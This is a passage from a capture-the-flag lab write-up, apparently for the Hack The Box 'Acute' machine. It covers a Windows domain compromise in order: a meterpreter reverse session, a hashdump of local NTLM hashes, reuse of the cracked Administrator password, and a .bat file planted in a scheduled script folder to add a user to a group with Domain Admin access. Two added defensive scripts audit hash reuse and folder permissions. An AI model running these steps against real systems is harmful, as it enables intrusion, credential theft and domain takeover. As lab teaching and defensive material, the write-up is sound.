Invoke-Command -Credential $cred -ComputerName atsserver -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}

[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 2 opened (10.10.16.7:8443 -> 10.10.11.145:49786) at 2024-07-22 06:04:23 -0400
```

```bash
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x64/windows  ACUTE\edavies @ ACUTE-PC01  10.10.16.7:443 -> 10.10.11.145:49848 (172.16.22.2)
  2         meterpreter x64/windows  ACUTE\jmorgan @ ACUTE-PC01  10.10.16.7:8443 -> 10.10.11.145:49786 (172.16.22.2)

msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: ACUTE\jmorgan
```

```powershell
PS C:\Users\jmorgan\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
```

## **Shell as awallace**

I will use the `hashdump` feature to dump the local hashes and try to crack them:

```bash
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
```

Only the Administrator hash was cracked, using `https://crackstation.net/`:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FHEbiUrksm4iJHsWGoZlR%2FPasted%20image%2020240722135939.png?alt=media&#x26;token=a73267ea-4bd3-4cd2-b23b-309ce8c0919f" alt=""><figcaption></figcaption></figure>
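Before anyone tries to crack a dump like the one above, a defender can already read several things off it: accounts whose NT hash is the well-known empty-password hash, accounts that still carry a real LM hash, and accounts that share one NT hash (the same password set on several accounts, the reuse that later turns the Administrator password into `awallace`'s). The following script, an added example that is not part of the original write-up, parses the `user:rid:lm:nt:::` lines meterpreter printed and reports exactly that; the second listing is constructed with placeholder hashes to show the reuse and LM cases.

```python
# Added example (not part of the original write-up): hygiene audit over a
# pwdump/hashdump listing, without cracking anything.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# The write-up's hashdump output, copied as printed.
ACUTE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
"""

# Constructed listing with placeholder hashes: two accounts sharing one NT
# hash (password reuse) and one account that still stores an LM hash.
CONSTRUCTED_DUMP = """\
svc_sql:1005:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
backup:1006:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1007:11223344556677889900aabbccddeeff:fedcba9876543210fedcba9876543210:::
"""


def parse_hashdump(text: str) -> list:
    """Turn pwdump-format lines into dicts with user, rid, lm and nt fields."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError("not a pwdump line: %r" % line)
        rows.append({
            "user": parts[0],
            "rid": int(parts[1]),
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return rows


def audit_hashes(rows: list) -> dict:
    """Report empty passwords, stored LM hashes and NT hashes shared by accounts."""
    report = {"empty_password": [], "lm_present": [], "reused_nt": []}
    by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:            # blank password (often a disabled built-in)
            report["empty_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:            # LM storage should be off everywhere
            report["lm_present"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            report["reused_nt"].append(sorted(users))
    return report


if __name__ == "__main__":
    print("acute:      ", audit_hashes(parse_hashdump(ACUTE_DUMP)))
    print("constructed:", audit_hashes(parse_hashdump(CONSTRUCTED_DUMP)))
```

On the Acute dump only the two empty-password built-ins are flagged; the cross-host reuse that matters here (Administrator on `Acute-PC01` versus `awallace` on `ATSSERVER`) only shows up when dumps from both hosts are fed to the same audit.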

I want to know which users exist on `atsserver`:

```powershell
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls C:\Users}


    Directory: C:\Users

Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
d-----        20/12/2021     23:30                .NET v4.5                          atsserver                         
d-----        20/12/2021     23:30                .NET v4.5 Classic                  atsserver                         
d-----        20/12/2021     20:38                Administrator                      atsserver                         
d-----        21/12/2021     23:31                awallace                           atsserver                         
d-----        21/12/2021     16:01                imonks                             atsserver                         
d-----        22/12/2021     00:11                lhopkins                           atsserver                         
d-r---        20/12/2021     20:38                Public                             atsserver
```

I will try to authenticate as each of these users with the Administrator password I cracked

```powershell
$password = ConvertTo-SecureString -AsPlainText -Force 'Password@123'
$credential = New-Object System.Management.Automation.PSCredential("acute\awallace", $password)
```

I got a hit with the `awallace` user

```powershell
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {whoami}
acute\awallace
```

I tried to enumerate the Program Files folder before as `imonks` but got `Access Denied`, so I will enumerate it again as `awallace`

```powershell
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls "C:\Program Files"}

    Directory: C:\Program Files


Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
d-----        21/12/2021     00:04                common files                       atsserver                         
d-----        21/12/2021     00:11                Hyper-V                            atsserver                         
d-----        15/09/2018     08:12                internet explorer                  atsserver                         
d-----        01/02/2022     19:41                keepmeon                           atsserver                         
d-----        21/12/2021     00:04                VMware                             atsserver                         
d-----        20/12/2021     21:19                Windows Defender                   atsserver                         
d-----        20/12/2021     21:12                Windows Defender Advanced Threat   atsserver                         
                                                  Protection
d-----        21/12/2021     14:13                WindowsPowerShell                  atsserver 
```

This time I will look at `keepmeon` again

```powershell
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls "C:\Program Files\keepmeon"}

    Directory: C:\Program Files\keepmeon

Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
-a----        21/12/2021     14:57            128 keepmeon.bat                       atsserver  
```

Listing the content of the file gives this script:

```powershell
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat "C:\Program Files\keepmeon\keepmeon.bat"}

REM This is run every 5 minutes. For Lois use ONLY
@echo off
 for /R %%x in (*.bat) do (
 if not "%%x" == "%~0" call "%%x"
)
```

Asking ChatGPT about the exact function of that script:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FBVhg9zRdoeOfmFbYMOJq%2FPasted%20image%2020240722141214.png?alt=media&#x26;token=5f76e48a-eb8d-4f25-b76c-bbcde1f563fd" alt=""><figcaption></figcaption></figure>

So, I can create a `.bat` file in that directory and get it executed within 5 minutes as `Lois`, as the comment says. We also saw that `Lois` is the only user who can add members to the `Site_admin` group, so I will add jmorgan to that group and get `Domain Admins` privileges
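As an added defender-side check (my own example, not part of the original writeup), the PowerShell function below lists every ACE on a script directory that lets a non-administrative identity create or modify files there. The path is the `keepmeon` folder from this box; the trusted-identity list is an assumption for a typical Windows host.

```powershell
# Added example, not from the writeup: report write-capable ACEs held by
# non-administrative identities on a directory that a privileged account
# executes scripts from. $TrustedIdentities is an assumed baseline.
function Find-WritableByUnprivileged {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$TrustedIdentities = @(
            'NT AUTHORITY\SYSTEM',
            'BUILTIN\Administrators',
            'NT SERVICE\TrustedInstaller',
            'CREATOR OWNER'
        )
    )

    # Rights that allow adding or altering a .bat file in the directory.
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                       [System.Security.AccessControl.FileSystemRights]::Modify -bor
                       [System.Security.AccessControl.FileSystemRights]::FullControl)
    # Inherited ACEs may carry generic rights instead of specific ones;
    # GENERIC_ALL (0x10000000) and GENERIC_WRITE (0x40000000) also allow writes.
    $writeMask = $writeMask -bor 0x10000000 -bor 0x40000000

    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $identity = $ace.IdentityReference.Value
        if ($TrustedIdentities -contains $identity) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }

        # Group entries (e.g. BUILTIN\Users) matter too: a domain user such as
        # awallace gains the write right through membership, not a named ACE.
        [pscustomobject]@{
            Path      = $Path
            Identity  = $identity
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

# Usage: run on ATSSERVER as an administrator. Any row returned is an identity
# that can plant a .bat file for keepmeon.bat to call; remove that ACE so only
# administrators can write to the directory.
Find-WritableByUnprivileged -Path 'C:\Program Files\keepmeon' | Format-Table -AutoSize
```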

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2F3cnUj2LtdB7KLaU1oJ35%2FPasted%20image%2020240722113755.png?alt=media&#x26;token=dd1ac641-40ef-477d-9884-c7ccd3c32f23" alt=""><figcaption></figcaption></figure>

The comment field confirms that the `site_admin` group has access to `Domain Admins`

```powershell
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}

Group name     Site_Admin
Comment        Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.
```

I write a `.bat` file into the `keepmeon` directory to add `awallace` to `site_admin`

```powershell
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Set-Content -Value 'net group site_admin awallace /add /domain' -Path "C:\Program Files\keepmeon\blind0bandit.bat"}
```

After a few minutes, the user is added

```powershell
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}

Group name     Site_Admin
Comment        Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
awallace                 
The command completed successfully.
```

Now the root flag can be read from the Administrator's desktop on `atsserver`

```powershell
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\Administrator\Desktop\root.txt}
d078dca1007c6bcdc86xxxxxxxxxxxxxxx
```

> Root Flag: d078dca1007c6bcdxxxxxxxxxxxxxxxx
